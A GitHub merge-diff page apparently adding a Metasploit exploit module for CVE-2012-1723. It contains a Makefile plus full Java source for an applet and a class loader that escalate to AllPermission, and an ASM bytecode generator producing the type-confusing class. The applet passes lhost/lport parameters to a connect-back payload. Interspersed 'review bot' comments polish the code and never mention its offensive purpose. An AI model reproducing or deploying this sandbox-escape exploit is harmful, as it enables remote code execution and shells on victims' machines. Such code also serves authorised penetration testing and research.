Merge branch 'module-cve-2012-1723' of https://github.com/LittleLight…
…LittleFire/metasploit-framework into LittleLightLittleFire-module-cve-2012-1723
Showing
15 changed files
with
628 additions
and
0 deletions.
@@ -0,0 +1,25 @@ | ||
JAR = CVE-2012-1723.jar | ||
|
||
ASM = asm-4.0.jar | ||
LIB = lib | ||
BIN = bin | ||
SRC = src | ||
|
||
JAVAC = javac -source 1.5 -target 1.5 | ||
|
||
all: | ||
${JAVAC} -cp ${LIB}/${ASM} src/cve1723/Generator.java -d ${LIB} | ||
java -cp ${LIB}:${LIB}/${ASM} cve1723.Generator | ||
-mkdir ${BIN} | ||
-mkdir ${BIN}/cve1723/ | ||
mv Confuser.class ${BIN}/cve1723/ | ||
find ${SRC} -not -name 'Generator.java' -name '*.java' -type f -print0 | xargs -0 ${JAVAC} -cp ${BIN} -sourcepath {} -d ${BIN} | ||
jar cf ${JAR} -C ${BIN} . | ||
|
||
install: ${JAR} | ||
cp ${JAR} ../../../../data/exploits | ||
|
||
clean: | ||
rm -rf ${BIN} | ||
-rm ${LIB}/cve1723/Generator.class | ||
-rm ${JAR} |
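Review bot: In the `all` target, `-sourcepath {}` reaches javac literally, because `{}` is a `find -exec` placeholder and xargs performs no substitution; the explicitly listed sources still compile, so the option is dead rather than harmful, and `-sourcepath ${SRC}` (or dropping it) says what was meant. `install: ${JAR}` depends on a file no rule produces, so on a fresh checkout `make install` fails with "No rule to make target" until `make all` has run; `install: all` or a comment stating the ordering would make that explicit.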
Binary file added
+1.46 KB
external/source/exploits/CVE-2012-1723/bin/cve1723/ConfusingClassLoader.class
Binary file added
+1.08 KB
external/source/exploits/CVE-2012-1723/bin/msf/x/PayloadX$StreamConnector.class
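--- a/external/source/exploits/CVE-2012-1723/src/cve1723/Attacker.java
+++ b/external/source/exploits/CVE-2012-1723/src/cve1723/Attacker.java
@@ -0,0 +1,63 @@
+package cve1723;
+
+import java.applet.Applet;
+import java.awt.*;
+import java.io.*;
+import java.net.URL;
+import java.nio.ByteBuffer;
+import java.nio.IntBuffer;
+
+/**
+* Attacker applet
+*/
+public class Attacker extends Applet {
+@Override
+public void init() {
+super.init();
+
+final Confuser c = new Confuser();
+for (int i = 0; i < 100000; i++) {
+c.confuse(null);
+}
+
+try {
+Thread.sleep(100);
+} catch (final InterruptedException ie) {
+//swallow
+}
+
+try {
+final ConfusingClassLoader cl = c.confuse(getClass().getClassLoader());
+final String names[] = { "msf.x.PayloadX", "msf.x.PayloadX$StreamConnector" };
+final String paths[] = { "/msf/x/PayloadX.class", "/msf/x/PayloadX$StreamConnector.class" };
+
+final String port = getParameter("lport");
+ConfusingClassLoader.defineAndCreate(cl, names, new byte[][] { loadClass(paths[0]), loadClass(paths[1])}, getParameter("data"), getParameter("jar"), getParameter("lhost"), (port == null ? 4444 : Integer.parseInt(port)));
+} catch (final Exception e) {
+e.printStackTrace();
+}
+}
+
+private byte[] loadClass(final String name) throws IOException {
+final ByteArrayOutputStream os = new ByteArrayOutputStream();
+{ // load the payload class
+final InputStream is = getClass().getResourceAsStream(name);
+int read;
+byte[] buffer = new byte[2048];
+
+while ((read = is.read(buffer, 0, buffer.length)) != -1) {
+os.write(buffer, 0, read);
+}
+}
+
+return os.toByteArray();
+}
+
+@Override
+public void paint(final Graphics g) {
+super.paint(g);
+
+final String tool = System.getSecurityManager() == null ? "null" : System.getSecurityManager().toString();
+g.drawString(tool, 0, 10);
+}
+}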
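Review bot: `loadClass` neither checks the result of `getResourceAsStream` for null nor closes the stream, so a missing resource surfaces as a NullPointerException inside `init`'s catch-all and the stream is left to the finalizer; the Makefile compiles with `-source 1.5`, so a try/finally rather than try-with-resources is the available form. The `InterruptedException` handler in `init` discards the interrupt without `Thread.currentThread().interrupt()`, and `java.net.URL`, `ByteBuffer` and `IntBuffer` are imported but never used. The class Javadoc `Attacker applet` adds nothing to the name; a sentence stating that `init` reads the applet parameters `lport` (default 4444), `data`, `jar` and `lhost` and that `paint` draws the current SecurityManager's `toString()` would tell a maintainer what to look for.
```java
private byte[] loadClass(final String name) throws IOException {
    final InputStream is = getClass().getResourceAsStream(name);
    if (is == null) {
        throw new IOException("resource not found: " + name);
    }
    final ByteArrayOutputStream os = new ByteArrayOutputStream();
    try {
        // … unchanged: 2048-byte read/write loop …
    } finally {
        is.close();
    }
    return os.toByteArray();
}
```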
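--- a/external/source/exploits/CVE-2012-1723/src/cve1723/ConfusingClassLoader.java
+++ b/external/source/exploits/CVE-2012-1723/src/cve1723/ConfusingClassLoader.java
@@ -0,0 +1,40 @@
+package cve1723;
+
+import java.lang.reflect.Field;
+import java.net.URL;
+import java.security.*;
+import java.security.cert.*;
+import java.security.cert.Certificate;
+import java.util.Enumeration;
+
+/**
+* Call the protected method
+*/
+public class ConfusingClassLoader extends ClassLoader {
+
+public static void defineAndCreate(final ConfusingClassLoader cl, final String name[], final byte data[][], final String hexdata, final String jar, final String lhost, final int lport) {
+try {
+final Permissions p = new Permissions();
+p.add(new AllPermission());
+final ProtectionDomain pd = new ProtectionDomain(new CodeSource(null, new Certificate[0]), p);
+
+final Class<?> clazz = cl.defineClass(name[0], data[0], 0, data[0].length, pd);
+cl.defineClass(name[1], data[1], 0, data[1].length, pd);
+
+final Field payload_data = clazz.getField("data");
+final Field payload_jar = clazz.getField("jar");
+final Field payload_lhost = clazz.getField("lhost");
+final Field payload_lport = clazz.getField("lport");
+
+payload_data.set(null, hexdata);
+payload_jar.set(null, jar);
+payload_lhost.set(null, lhost);
+payload_lport.set(null, lport);
+
+clazz.newInstance();
+} catch (final Exception e) {
+// swallow
+e.printStackTrace();
+}
+}
+}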
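Review bot: The `// swallow` comment in `defineAndCreate`'s catch block contradicts the `e.printStackTrace()` directly below it, and the single `catch (Exception)` folds together failures from `defineClass`, `getField`, `set` and `newInstance`, so a caller cannot tell which step broke. The class Javadoc `Call the protected method` should name it: `Subclass of ClassLoader that exists to reach the protected ClassLoader.defineClass(String, byte[], int, int, ProtectionDomain) overload; defineAndCreate defines name[0] and name[1] from data[0] and data[1], assigns the public static fields data, jar, lhost and lport of the first class reflectively, then instantiates it`, with `@param` entries noting that `name` and `data` must each hold at least two elements. The explicit `import java.security.cert.Certificate;` is doing real work — both `java.security.*` and `java.security.cert.*` export a `Certificate` type, and only the single-type import resolves the ambiguity for `new Certificate[0]` — which deserves a one-line comment; `URL` and `Enumeration` are unused.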
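--- a/external/source/exploits/CVE-2012-1723/src/cve1723/Generator.java
+++ b/external/source/exploits/CVE-2012-1723/src/cve1723/Generator.java
@@ -0,0 +1,132 @@
+package cve1723;
+
+import org.objectweb.asm.*;
+
+import java.io.ByteArrayOutputStream;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.nio.*;
+import java.util.Arrays;
+
+import static org.objectweb.asm.Opcodes.*;
+
+/**
+* CVE-2012-1723
+*/
+public class Generator {
+public static byte[] generateConfusion() {
+final String STATIC_FIELD_NAME = "staticTypeA";
+final String INSTANCE_FIELD_NAME = "instanceTypeB";
+final String CONFUSE_METHOD_NAME = "confuse";
+final String CONFUSER_CLASS_NAME = "cve1723/Confuser";
+
+final String TYPE_A = "Ljava/lang/ClassLoader;";
+final String TYPE_B = "Lcve1723/ConfusingClassLoader;";
+
+final ClassWriter cw = new ClassWriter(ClassWriter.COMPUTE_FRAMES | ClassWriter.COMPUTE_MAXS);
+
+MethodVisitor mv = null;
+FieldVisitor fv = null;
+
+cw.visit(V1_5, ACC_PUBLIC | ACC_SUPER, CONFUSER_CLASS_NAME, null, "java/lang/Object", null);
+
+// static field of type A (ClassLoader)
+{
+fv = cw.visitField(ACC_STATIC, STATIC_FIELD_NAME, TYPE_A, null, null);
+fv.visitEnd();
+}
+
+// one hundred fields of type B (ConfusingClassLoader)
+{
+for (int i = 0; i < 100; i++) {
+fv = cw.visitField(ACC_PUBLIC, INSTANCE_FIELD_NAME + i, TYPE_B, null, null);
+fv.visitEnd();
+}
+}
+
+// constructor
+{
+mv = cw.visitMethod(ACC_PUBLIC, "<init>", "()V", null, null);
+mv.visitCode();
+mv.visitVarInsn(ALOAD, 0);
+mv.visitMethodInsn(INVOKESPECIAL, "java/lang/Object", "<init>", "()V");
+mv.visitInsn(RETURN);
+mv.visitMaxs(0, 0);
+mv.visitEnd();
+}
+
+// confuse method
+{
+mv = cw.visitMethod(ACC_PUBLIC, CONFUSE_METHOD_NAME, "(" + TYPE_A + ")" + TYPE_B, null, null);
+mv.visitCode();
+/*
+aload 1 // push parameter onto stack
+ifnonnull cont:
+aconst_null
+areturn // quick return
+cont:
+getstatic STATIC_FIELD_NAME
+pop
+aload 0
+aload 1
+putfield STATIC_FIELD_NAME // force this into a non-static field
+// find instance field that's not null
+aload 0
+getfield INSTANCE_FIELD_NAME_1
+ifnull cont2:
+aload 0
+getfield INSTANCE_FIELD_NAME_1
+areturn
+cont2:
+...
+aconst_null
+areturn
+*/
+
+// first part
+mv.visitVarInsn(ALOAD, 1);
+final Label cont = new Label();
+mv.visitJumpInsn(IFNONNULL, cont);
+mv.visitInsn(ACONST_NULL);
+mv.visitInsn(ARETURN);
+mv.visitLabel(cont);
+
+// 2nd part
+mv.visitFieldInsn(GETSTATIC, CONFUSER_CLASS_NAME, STATIC_FIELD_NAME, TYPE_A);
+mv.visitInsn(POP);
+mv.visitVarInsn(ALOAD, 0);
+mv.visitVarInsn(ALOAD, 1);
+mv.visitFieldInsn(PUTFIELD, CONFUSER_CLASS_NAME, STATIC_FIELD_NAME, TYPE_A);
+
+for (int i = 0; i < 100; i++) {
+mv.visitVarInsn(ALOAD, 0);
+mv.visitFieldInsn(GETFIELD, CONFUSER_CLASS_NAME, INSTANCE_FIELD_NAME + i, TYPE_B);
+final Label contN = new Label();
+mv.visitJumpInsn(IFNULL, contN);
+mv.visitVarInsn(ALOAD, 0);
+mv.visitFieldInsn(GETFIELD, CONFUSER_CLASS_NAME, INSTANCE_FIELD_NAME + i, TYPE_B);
+mv.visitInsn(ARETURN);
+mv.visitLabel(contN);
+}
+
+mv.visitInsn(ACONST_NULL);
+mv.visitInsn(ARETURN);
+
+mv.visitMaxs(0, 0);
+mv.visitEnd();
+}
+cw.visitEnd();
+
+return cw.toByteArray();
+}
+
+public static void main(final String args[]) throws Exception {
+final byte data[] = Generator.generateConfusion();
+final FileOutputStream fo = new FileOutputStream("Confuser.class");
+fo.write(data);
+fo.close();
+}
+}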
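Review bot: `main` closes the `FileOutputStream` only on the happy path, so a failed `write` leaks the handle; with the `-source 1.5` target the Makefile sets, the form is `try { fo.write(data); } finally { fo.close(); }`. `ByteArrayOutputStream`, `InputStream`, `java.nio.*` and `Arrays` are imported but unused, and `mv`/`fv` are pre-initialised to null at method scope when each braced section could declare its own visitor. The class Javadoc `CVE-2012-1723` is an identifier, not a description; `generateConfusion` would read better with a header stating that it assembles the class `cve1723/Confuser` with ASM — one static `ClassLoader` field, one hundred public `ConfusingClassLoader` fields, a no-arg constructor and the `confuse` method laid out in the pseudo-assembly comment — and returns the class bytes, and `main` with a note that it writes them to `Confuser.class` in the working directory (the Makefile then moves that file into `bin/cve1723/`). The rendered section reports 132 added lines but only 130 are visible here, so two blank lines were presumably lost in rendering.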